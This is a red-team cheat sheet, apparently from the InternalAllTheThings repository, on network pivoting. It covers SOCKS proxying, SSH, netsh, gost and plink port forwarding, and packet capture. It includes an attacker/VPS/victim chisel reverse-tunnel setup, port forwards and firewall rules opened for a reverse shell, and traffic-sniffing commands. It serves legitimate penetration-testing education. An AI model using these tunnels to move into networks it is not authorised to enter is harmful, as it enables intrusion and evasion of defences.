network-pivoting-techniques.md (8130B)
1 --- 2 title: "Network Pivoting Techniques" 3 section: "Red Team" 4 sectionSlug: "redteam" 5 sourcePath: "docs/redteam/pivoting/network-pivoting-techniques.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/pivoting/network-pivoting-techniques.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Network Pivoting Techniques 12 13 ## SOCKS Proxy 14 15 ### SOCKS Compatibility Table 16 17 | SOCKS Version | TCP | UDP | IPv4 | IPv6 | Hostname | 18 | ------------- | :---: | :---: | :---: | :---: | :---: | 19 | SOCKS v4 | ✅ | ❌ | ✅ | ❌ | ❌ | 20 | SOCKS v4a | ✅ | ❌ | ✅ | ❌ | ✅ | 21 | SOCKS v5 | ✅ | ✅ | ✅ | ✅ | ✅ | 22 23 ### SOCKS Proxy Usage 24 25 #### Proxychains 26 27 * [rofl0r/proxychains-ng](https://github.com/rofl0r/proxychains-ng) - a preloader which hooks calls to sockets in dynamically linked programs and redirects it through one or more socks/http proxies. continuation of the unmaintained proxychains project. 28 * [haad/proxychains](https://github.com/haad/proxychains) - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy. Supported auth-types: "user/pass" for SOCKS4/5, "basic" for HTTP. 29 30 Edit the **configuration file** `/etc/proxychains.conf` to add the SOCKS proxies. 31 32 ```bash 33 [ProxyList] 34 # socks4 localhost 8080 35 socks5 localhost 8081 36 ``` 37 38 Uncomment `proxy_dns` to also proxify DNS requests. 39 40 ```ps1 41 proxychains nmap -sT 10.10.10.10 42 proxychains curl http://10.10.10.10 43 ``` 44 45 #### Proxifier 46 47 Proxifier allows network applications that do not support working through proxy servers to operate through a SOCKS or HTTPS proxy and chains. 48 49 * [proxifier](https://www.proxifier.com/) - The Most Advanced Proxy Client 50 51 Open Proxifier, go to **Profile** -> **Proxy Servers** and **Add a new proxy entry**, which will point at the IP address and Port of your SOCKS proxy. 52 53 Go to **Profile** -> **Proxification Rules**. This is where you can add rules that tell Proxifier when and where to proxy specific applications. Multiple applications can be added to the same rule. 54 55 #### Graftcp 56 57 * [hmgle/graftcp](https://github.com/hmgle/graftcp) - A flexible tool for redirecting a given program's TCP traffic to SOCKS5 or HTTP proxy. 58 59 :warning: Same as proxychains, with another mechanism to "proxify" which allow Go applications. 60 61 ```ps1 62 # Create a SOCKS5, using Chisel or another tool and forward it through SSH 63 (attacker) $ ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS 64 (vps) $ ./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse 65 (victim 1) $ ./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks 66 67 # Run graftcp and specify the SOCKS5 68 (attacker) $ graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080 69 (attacker) $ graftcp ./nuclei -u http://10.10.10.10 70 ``` 71 72 Simple configuration file for graftcp: [example-graftcp-local.conf](https://github.com/hmgle/graftcp/blob/master/local/example-graftcp-local.conf) 73 74 ```py 75 ## Listen address (default ":2233") 76 listen = :2233 77 loglevel = 1 78 79 ## SOCKS5 address (default "127.0.0.1:1080") 80 socks5 = 127.0.0.1:1080 81 # socks5_username = SOCKS5USERNAME 82 # socks5_password = SOCKS5PASSWORD 83 84 ## Set the mode for select a proxy (default "auto") 85 select_proxy_mode = auto 86 ``` 87 88 ## Port Forwarding 89 90 ### SSH (native) 91 92 | Pivoting Technique | Command | 93 | ---------------------- | ---------------------------------------------------------------- | 94 | Local Port Forwarding | `ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]` | 95 | Remote Port Forwarding | `ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]` | 96 | Socks Proxy | `ssh -N -f -D listenport [user]@[host]` | 97 98 Inside an already established SSH session, press `~C` to opens an interactive mode to add local (-L), remote (-R), or dynamic (-D) port forwards. `-D` currently cannot be added after connection. Only `-L` or `-R` work reliably. Dynamic forwarding inside an existing session is not supported by OpenSSH. 99 100 ```ps1 101 ~C 102 -L 1080:127.0.0.1:1080 103 ``` 104 105 ### Netsh (native) 106 107 ```powershell 108 netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport 109 netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110 110 ``` 111 112 ```powershell 113 # Forward the port 4545 for the reverse shell, and the 80 for the http server for example 114 netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545 115 netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80 116 ``` 117 118 ```powershell 119 # Correctly open the port on the machine 120 netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80 121 netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80 122 netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545 123 netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545 124 ``` 125 126 1. listenaddress – is a local IP address waiting for a connection. 127 2. listenport – local listening TCP port (the connection is waited on it). 128 3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected. 129 4. connectport – is a TCP port to which the connection from listenport is forwarded to. 130 131 ### Custom Tools 132 133 * [jpillora/chisel](https://github.com/jpillora/chisel) 134 * [ginuerzh/gost](https://github.com/ginuerzh/gost) 135 136 ```ps1 137 gost -L=tcp://:2222/192.168.1.1:22 [-F=..] 138 ``` 139 140 * [PuTTY/plink](https://putty.org/index.html) 141 142 ```powershell 143 plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] 144 plink -l root -pw toor -R 445:127.0.0.1:445 145 ``` 146 147 ## Network Capture 148 149 ### TCPDump 150 151 * [the-tcpdump-group/tcpdump](https://github.com/the-tcpdump-group/tcpdump) 152 153 ```ps1 154 # capture and save the output inside 0001.pcap 155 tcpdump -w 0001.pcap -i eth0 156 157 # capture and display packet in ASCII 158 tcpdump -A -i eth0 159 160 # capture every TCP packet on interface eth0 161 tcpdump -i eth0 tcp 162 163 # capture everything on port 22 164 tcpdump -i eth0 port 22 165 ``` 166 167 ### Netsh 168 169 * Start a capture use the netsh command. 170 171 ```ps1 172 netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384 173 ``` 174 175 * Stop the trace 176 177 ```ps1 178 netsh trace stop 179 ``` 180 181 * Event tracing 182 183 ```ps1 184 netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384 185 etl2pcapng.exe c:\trace.etl c:\trace.pcapng 186 ``` 187 188 * Use filters 189 190 ```ps1 191 netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384 192 ``` 193 194 ## References 195 196 * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) 197 * [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre ZANNI](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) 198 * [GO Simple Tunnel - Documentation](https://gost.run/en/) 199 * [Ligolo-ng - Documentation](https://docs.ligolo.ng/) 200 * [Overview of network pivoting and tunneling [2022 updated] - Alexandre ZANNI](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/) 201 * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/) 202 * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin - November 10, 2015](https://web.archive.org/web/20151205120607/https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) 203 * [Windows: Capture a network trace with builtin tools (netsh) - Michael Albert - February 22, 2021](https://michlstechblog.info/blog/windows-capture-a-network-trace-with-builtin-tools-netsh/)